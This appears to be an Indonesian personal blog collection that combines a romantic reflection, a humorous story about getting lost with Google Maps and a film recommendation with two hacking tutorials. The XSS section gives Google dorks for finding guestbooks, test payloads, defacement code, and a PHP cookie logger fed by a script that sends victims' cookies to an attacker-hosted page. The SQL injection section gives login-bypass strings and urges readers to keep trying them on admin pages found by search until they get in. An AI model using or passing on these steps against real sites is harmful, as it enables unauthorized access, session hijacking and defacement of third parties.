Isyarat

Hanya isyarat. Ya, itulah kata yang tepat untuk menggambarkan semuanya. Seperti kisah yang ditulis dee dalam kumpulan 11 cerpennya, Rectoverso. Hanya isyarat yang mampu kusampaikan jika pagi menjelang. Aku selalu menantikan pagi. Pagi berarti aku sudah melewati lagi 1 hari didalam hidupku dan pagi datang dengan membawa harapan yang baru. Pagi juga membawaku pada pertemuan itu. Pertemuan yang tidak disengaja tapi berlangsung seperti sudah diatur. Kita tidak saling mengenal, namum alam selalu mempertemukan kita. Bertemu di tempat yang sama dalam posisi yang nyaris sama hampir setiap hari. Apakah kamu menyadarinya?

Hanya isyarat. Cinta sebatas punggung. Hanya dengan menatap punggungmu yang berjalan jauh didepanku, aku bisa merasakan energi baru untuk melalui hari ini. Aku bisa merasakan ada detak tak beraturan di dalam jantungku jika kita berdiri bersisian.

"... Aku sampai di bagian bahwa aku telah jatuh cinta. Namun orang itu hanya dapat kugapai sebatas punggungnya saja. Seseorang yang hadir sekelebat bagai bintang jatuh yang lenyap keluar dari bingkai mata sebelum tangan ini sanggup mengejar. Seseorang yang hanya bisa kukirimi isyarat sehalus udara, langit, awan, atau hujan."

Kutipan dari kisah hanya isyarat ini begitu melekat padaku. Seseorang yang hanya mampu ku gapai sebatas punggungnya. Aku tidak tahu skenario apa yang sedang dijalankan sang sutradara terbaik di semesta ini. Yang kutahu hanya aku bisa merasakanmu. Itu sudah cukup. Kurang dari 2 jam di setiap pagiku aku bisa menatap punggungmu lama dan aku mendapat cukup energi untuk melalui hari ini. Hanya satu kata yang ingin kuucapkan untukmu "Hello" dan itu sudah lebih dari cukup, sayangnya aku belum punya daya untuk sekedar mengucapkan kata itu.

"I used to hide and watch you from a distance and i knew you realized
I was looking for a time to get closer at least to say... “hello” "

-endah and rhesa: when you love someone-
Hanya isyarat, ketika kata tak sanggup terucap, aku hanya bisa mengirimkan semua isyarat ini melalui semesta. Rasakanlah seperti aku bisa merasakan adanya dirimu.

me vs google maps

Kemaren gue abis baca buku barunya raditya dika yang judulnya manusia setengah salmon. Pas nemu bab di bukunya yang menceritakan si raditya dika bersama adik-adiknya nyasar di venice gara-gara google maps mati, gue jadi inget sama pengalaman gue yang bergantung nyari jalan pake google maps dan gue sukses nyasar gara-gara ditengah jalan koneksinya mati. Nah pengalaman di raditya dika masih sedikit elit gitu yah, kesasar di venice, yang notabene emang kota dengan banyak gang. Nah, gue kesasarnya di TB simatupang. Kurang elit gimana itu nyasar di TB simatupanng gara-gara google maps mati koneksinya..
Kejadian ini bermula ketika gue dan kedua temen gue (sebut saja mawar dan melati) harus ngejar dosen buat ngumpulin tugas. Batas waktu buat ngumpulin tugas jam 7 dan kita bertiga harus ngejar dia ke TB simatupang. Dan harus gue akui biang keladi dari kejadian nyasar ini adalah gue juga. Soalnya gue keukeuh ngikutin jalan yang ditunjukin sama google maps. Padahal bokapnya melati iudah nunjukin jalan yang baik dan benar buat sampe kesana. Ya benar gue ini emang biangnya nyasar. Tiap gue pergi sama siapa aja pasti nyasar. Mau di dalam kota maupun luar kota gue selalu kesasar.

Gara-gara nyasar ini gue dan mawar melati jadi muter-muter naek busway keliling dari kampung melayu turun di  harmoni dan ujung-ujungnya berakhir di dukuh atas kemudia naik busway arah ragunan dan turun di halte busway deptan. Udah sampe di depan deptan kita bertiga nanya ke petugas busway kalo mau ke graha simatupang naek angkot apaan. Petugas busway ngasih tau kalo naek angkot harus jalan sedikit dari situ. Kita ikuti saran dari petugas tersebut. Setelah sampe, banyak angkot disitu tapi kita ga tau angkot apaan yang lewat depan graha siamtupang. Akhirnya kita putuskan naek taksi. Emang dasar sial ato gimana si supir taksi ini ga tau jalan (oh.my.god) dan kita akhirnya ngandelin google maps lagi. Dan sekali lagi internet mati dan kita sukses muter-muter sampe 3 kali buat nyari dimana graha simatupang. Untungnya bukan sampe 3 kali puasa kita nemuin graha siamtupangnya (bang toyib kali ah). Setelah muter yang ketiga kalinya google maps kembali menyala dan akhirnya tibalah kita di graha simatupang untuk menyerahkan tugas kuliah. Selesai ngasih tugas ke dosen kita bertiga meratap. Perjalanan muter-muter yang diwarnai dengan nyasar berakhir cuma buat ngasih tugas yang ga lebih dari 5 menit.
Mungkin pengalaman nyasar gue yang agak elit adalah nyasar di simpang lima semarang. Sekali lagi nyasar ini diakibatkan oleh google maps yang koneksinya mati di tengah jalan. Niat awalnya gue sama kakak sepupu gue mau ngebolang dari hotel ke simpang lima jalan kaki. Karena kata orang hotel, dari hotel ke simpang ga jauh. Terpengaruh deh tuh. Karena baru pertama kalinya ke semarang, akhirnya kita mengandalkan google maps sebagai penunjuk arah. Tipikal jalan di semarang kan juga banyak perempatan, jadinya pas google maps mati kita ngandelin feeling buat sampe ke simpang lima. Sampe akhirnya nyampe entah dimana dan udah lumayan jauh berjalan, baru sadar kalo nyasar (agak telat sadarnya). Setelah tanya sana-sini dengan logat jawa yang dibuat akhirnya sampe juga di simpang lima. Kalo kebanyakan pelancong bakal nyari tempat yang unik kalo lagi liburan di luar kota. Gue dan kakak sepupu tergolong ajaib dan kurang kerjaan pas ke semarang, karena kita ga tau mau ngapain disemarang. Akhirnya nyampe di simpang lima, makan di emperan yang nyediain makanan-makanan khas semarang dan abis itu langsung nyebrang ke mal citra cuma buat nonton film MERANTAU. Untungnya pas hari pertama aja kelakukan kaya gitu. Hari berikutnya beneran maen ke ikonnya semarang yaitu lawang sewu. Bikin jiper disini apalagi kakak sepupu gue termasuk orang yang bisa "lihat" makhluk yang ga terlihat sama kita. Dan sialnya gue diceritain dia ngeliat  apa aja disana.
Sekian lah pengalaman nyasar gara-gara google maps mati ditengah jalan.

Mission Impossible: Ghost Protocol

Sepertinya hampir 2 minggu gue ga update info tentang film-film yang pas di tonton buat weekend. Lagi agak sibuk soalnya (hehehehehehe). Ini aja gue nyolong-nyolong buat update blog, dikarenakan gue lagi ga mood banget utak-atik program. Baiklah sodara-sodara daripada gue nanti jadinya malah curhat mari kita langsung ke topik aja. Buat minggu ini gue mau merekomendasikan film Mission Impossible: Ghost Protocol. Film ini bercerita tentang ethan hunt (tom cruise) beserta tim barunya (Jeremy Renner, Paula Patton dan Simon Pegg) dalam misi untuk membersihkan nama institusi mereka yaitu IMF (Imposible Mission Force) yang dituduh dalam plot pengeboman global yang dilakukan oleh teroris. Mereka harus menyamar dan selama penyamaran tidak ada telpon, tidak ada kontak dan pastinya mereka harus tidak dapat dilacak.

Film ini wajib ditonton bagi mereka yang sangat menyukai genre film action. Karena adegan-adegan di film ini full action. Salah satu action yang bikin gue takjub di film ini adalah ketika ethan hunt memanjat menara tertinggi di dunia yaitu Burj Khalifa. Dan dari berita-berita yang gue baca, dalam melakukan aksi ini tom cruise ngga pake jasa pemeran pengganti (wooooow). Yang lebih seru lagi film ini hadir dalam format IMAX. Yup, tunggu apa lagi mari ke XXI atau Blitz Megaplex terdekat buat nonton film ini. Happy Weekend \(^0^)/

XSS Injector

XSS Injections

XSS merupakan sebuah serangan yang termasuk dalam jenis injeksi kode. Penyerangan ini dilakukan dengan cara memasukkan kode-kode html ke dalam suatu situs. Akibat yang bisa ditimbulkan dari serangan ini antara lain penyerang dapat memotong keamanan dari sisi klien, mendapatkan informasi yang bersifat case sensitif, atau bisa saja menyisipkan aplikasi berbahaya ke dalam web yang diserang.

Ada dua tipe serangan XSS:

1. Reflected atau nonpersistent
   tipe serangan XSS ini merupakan tipe serangan yang paling umum dilakukan oleh penyerang. Cara kerjanya adalah penyerang menggunakan tautan pada media social engineering agar tautan yang sudah disisipi kode berbahaya ini diklik oleh pengguna. Jika tautan berbahaya ini diklik oleh pengguna maka penyerang akan mendapatkan cookie pengguna yang nantinya akan digunakan untuk membajak session pengguna. Pertahanan untuk menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data dan jangan mudah percaya pada apapun yang dikirim pengguna, terutama jika itu merupakan sebuah tautan.
2. Stored atau Persistent
   serangan jenis ini jarang ditemui tetapi memiliki dampak serangan yang besar. Sebuah serangan pada stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi pada saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali.

Contoh penggunaan XSS injector

1. masukkan kata kunci inurl:.com/guestbook ke dalam mesin pencari google, keyword tersebut digunakan untuk mencari alamat website .com/guestbook
2. setelah pencarian keluar, lalu pilih website mana yang akan kita jadikan sasaran XSS injector, setelah lakukan pengetesan dengan cara memasukkan kode dibawah ini ke dalam textfield yang ada dibagian guestbook.
   <script>alert(“/XSS”/)</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>;
<script>alert(String.fromCharCode(88,83,83))</script>
<body onload=alert(‘XSS’)>
<script type=text/javascript>alert(“XSS”)</script>
3. jika setelah di enter muncul pop up yang berisi tulisan XSS, itu artinya situs tersebut siap untuk kita serang.
4. Beberapa jenis serangan yang bisa kita lakukan adalah melakukan defacement dan mencuri cookies dari website tersebut.
5. Untuk melakukan defacement kita dapat memasang kode
   <meta http-equiv=”refresh” content=”0;url=http://www.tinypic.com/deface.png” />
   atau
   <script>window.open( “http://www.tinypic.com/deface.png” )</script>
6. sedangkan untuk melakukan pencurian cookies. Jika kita memasukkan script berikut ini <script>alert(document.cookie)</script> , kita dapat mencuri login information dari situs yang kita serang. Namun kita harus menggunakan cookie editor untuk bisa menggunakan cookie yang tercuri tersebut.
7. Alternatif lain adalah dengan membuat cookie logger sendiri. Buat sebuah file dengan nama cookielogger.php. Masukkan script dibawah ini:
   <?php
$cookie = $_GET['cookie'];
$log = fopen(“cookies.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>
8. setelah itu buat sebuah file kosong dengan nama cookies.txt. File kosong ini nantinya akan digunakan untuk menuliskan hasil cookie yang kita curi. Setelah itu upload kedua file ini kedalam media hosting yang mendukung php seperti ripway.com, 000webhost.com dan lain-lain.
9. Kemudian sisipkan kode berikut ke situs yang akan diserang
10. <script>alert(namalogin.namamediahostingkamu.com/cookielogger.php)</script>
11. atau
12. <script>document.location=’namalogin.namamediahostingkamu.com/cookielogger.php?
cookie=’+escape(document.cookie) </script>
13. setelah memasukkan kode tersebut maka cookie akan tertulis di file cookies.txt yang kita hosting ke dalam media hosting kita. Login kedalam media host kemudian buka file cookies.txt

SQL Injector

Sql injections

apa itu sql injections?

Sql injections adalah salah satu teknik hacking yang memanfaatkan celah keamanan yang terjadi pada lapisan basis data dalam sebuah aplikasi. Cara kerja sql injections adalah dengan memodifikasi perintah sql yang ada di memori aplikasi pengguna.

Penyebab terjadinya sql injections

sql injections terjadi dikarenakan tidak adanya filter terhadap karakter-karakter seperti tanda petik satu ' , karakter double minus –. hal inilah yang menyebabkan suatu aplikasi dapat disisipi oleh perintah-perintah sql yang dimanfaatkan untuk melakukan suatu penyerangan terhadap aplikasi.

Bahaya sql injections

salah satu bahaya yang bisa ditimbulkan dari penyerangan ini adalah seseorang bisa masuk ke dalam sistem tanpa harus memiliki account. Hal ini juga bisa memicu seseorang yang tidak memiliki izin masuk ke dalam sistem untuk merubah, menghapus dan menambahkan data-data yang ada di dalam database. Penyerangan ini juga memungkinkan seseorang untuk mematikan suatu database, sehingga web server tidak bisa mengakses data-data yang ada di dalam database tersebut.

Yang diperlukan untuk melakukan sql injections

1. browser
2. sambungan internet
3. software, contoh software yang digunakan adalah softice

contoh sintaks yang bisa digunakan untuk sql injections

$SQL = “select*from login where username = '$username' and password = '$password'”; (diperoleh dari get dan post variable)

sisipkan perintah OR'=' kedalam password, sehingga akan didapat kode

“select*from login where username = '$username' and password = 'pass' or '='”;

dengan begitu kita sudah bisa meng-inject sebuah sintaks sql hanya dengan menggunakan perintah OR.

Cara mencegah dan mengatasi sql injections

1. dengan melindungi query sql
teknik yang bisa diterapkan untuk melindungi query sql adalah dengan cara mengosongkan seluruh input yang diterima dari request object, seperti: Request, Request.Querystring,Request.Form,Request.Cookies dan Request.ServerVariables. Akan tetapi teknik ini sangat bergantung pada RDBMS. RDBMS memiliki sistem yang multiuser, sehingga RDMS menyertakan fitur keamanan untuk mengontrol akses ke/dan penggunaan database.
2. mengganti pesan error
cara kedua adalah dengan mengganti pesan error. Hal ini dikarenakan para penyerang bisa memanfaatkan pesan error ini untuk menelusuri jalur penyimpanan database.
3. batasi permisi
berikan hak izin hanya pada user yang terotorisasi saja. User harus yakin bahwa data yang ia terima sudah akurat dan tidak melakukan kecerobohan dalam memodifikasinya
4. sembunyikan atau matikan pesan error yang keluar dari SQL server yang sedang berjalan
5. jika memungkinkan, matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures
6. menggunakan MYSQL_escape_string

cara kerja teknik ini adalah dengan merubah string yang mengandung karakter ' menjadi \'. contohnya SQL infec'tion menjadi SQL infec\tion.

7. melakukan filter terhadap karakter ' dengan memodifikasi php.ini

modifikasi ini dimaksudkan untuk mengaktifkan variable magic_qoutes pada php.ini sehingga secara otomatis karakter ' diubah menjadi karakter \ .

contoh implementasi sql injections

1. masukkan salah satu dari keyword dibawah ini kedalam mesin pencari google
   “/admin.asp”
   “/login.asp”
   “/logon.asp”
   “/adminlogin.asp”
   “/adminlogon.asp”
   “/admin_login.asp”
   “/admin_logon.asp”
   “/admin/login.asp”
   “/admin/logon.asp”
   (anda bisa menambahkan sendiri keyword sesuai keinginan anda)
2. kemudian buka salah satu link yang berhasil ditemukan oleh google, kemungkinan hasil pencarian yang ditampilkan adalah sebuah halaman login.
3. Setelah itu masukkan kode berikut :
   Username : 'or 'a'='a
   Password : 'or 'a'='a
4. jika anda berhasil, maka kemungkinan anda akan masuk ke dalam halaman admin panel. Di halaman admin panel ini anda bisa menambahkan berita,mengedit user lain dan lain-lain.
5. Jika cara diatas belum berhasil, coba untuk membuka link lain yang ditampilkan di mesin pencari google.
6. Banyaknya variasi kode memungkinkan kita untuk bisa mengeksplor kode program, seperti:
   Username : admin
   Password : 'or 'a '=' a
   atau kita juga bisa mengkombinasikan kedua kode tersebut, sehingga bentuk kodenya menjadi:
   'or 0=0 -- ; “or 0=0 -- ; 'or 0=0 #;
7. jika masih belum berhasil, coba terus terus sampai anda berhasil masuk ke dalam admin panel